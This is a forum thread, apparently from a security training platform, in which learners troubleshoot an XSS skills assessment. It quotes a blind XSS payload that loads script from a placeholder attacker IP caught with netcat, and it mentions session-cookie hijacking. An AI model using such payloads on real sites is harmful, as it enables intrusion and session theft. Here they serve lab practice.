Cross Site Scripting XSS Skills Assessment

I can not get this assessment to work. I have discovered the comment section so have had my payload as: "><script src=http://MY-IP/field></script> and i recieve nothing. If I manually do this and type my IP into the browser, my netcat receives the request but on this website it just wont work.

I have been stuck for days and I just think there is a problem with this website, same with the session hijacking and phishing parts. All of them I have had the correct payload that everyone else has used but when I use it, it wont work.

Any help would be awesome, thanks :wink:

Hey! Its been a while since I have done that skill assessment, but this payload just looks like the one to identify the vulnerable field. I thought you needed to direct it at a script to get the cookie? I would take another look at your payload.

Feel free to DM me if you need more help.

Yes, I am using this script to identify which field is vulnerable to XSS and then I’ll send my script to the field I receive a request from. Sadly I am not receiving anything on netcat, can’t seem to figure out why.

hi just remember to add the port you’re listening on in your script if it’s correctly configured it should respond 10 times out of 10 if it’s the correct field. I hope this helps and good luck.

Hi, can you help me? i cannot resolved this question: "What type of XSS was found on the above server? “name only” " for XSS Discovery sections.
can you help me?

use zap attack proxy, the answer is the type found by ZAP.

Can someone help me with this one, please? I dont know what Im doing wrong